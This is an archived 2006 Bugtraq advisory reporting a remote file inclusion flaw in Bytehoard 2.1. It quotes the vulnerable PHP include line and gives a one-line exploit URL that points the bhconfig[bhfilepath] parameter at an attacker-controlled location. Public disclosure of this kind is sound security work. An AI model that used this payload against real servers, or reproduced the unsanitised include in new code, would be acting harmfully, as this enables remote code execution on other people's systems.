Bytehoard 2.1 Remote File Include

To: bugs@xxxxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx, submit@xxxxxxxxxxx
Subject: Bytehoard 2.1 Remote File Include
From: beford <xbefordx@xxxxxxxxx>
Date: Thu, 1 Jun 2006 22:36:24 -0500
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=FAVKpcM4JxhV4b2PHc+qwKS6f/obD5yMwFCg3C1aIQLPKSaI0C1ZH9XzLp0X6AmWJ11TAdaVNsBQS7r+mWYATYpUgBrPmnyeb1SxCXWlS6Mmk56X+LJPZwRPMEAW+rEekp1uqzv13D0tp2TK/Ivcj1ojj62kdGYaVnUGIQvc0ho=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Script: Bytehoard 2.1 Epsilon/Delta  www.bytehoard.org
Discovered: beford <xbefordx gmail com>
File: ./bytehoard/includes/webdav/server.php
Vuln: Remote File Include

[code]
require_once $bhconfig['bhfilepath']."/includes/webdav/_parse_propfind.php";
[/code]


http://url.com/bytehoard/includes/webdav/server.php?bhconfig[bhfilepath]=attacker

Prev by Date: PHP ManualMaker v1.0
Next by Date: newsfactory Cross Site Scripting & SQL injection
Previous by thread: PHP ManualMaker v1.0
Next by thread: newsfactory Cross Site Scripting & SQL injection
Index(es):
- Date
- Thread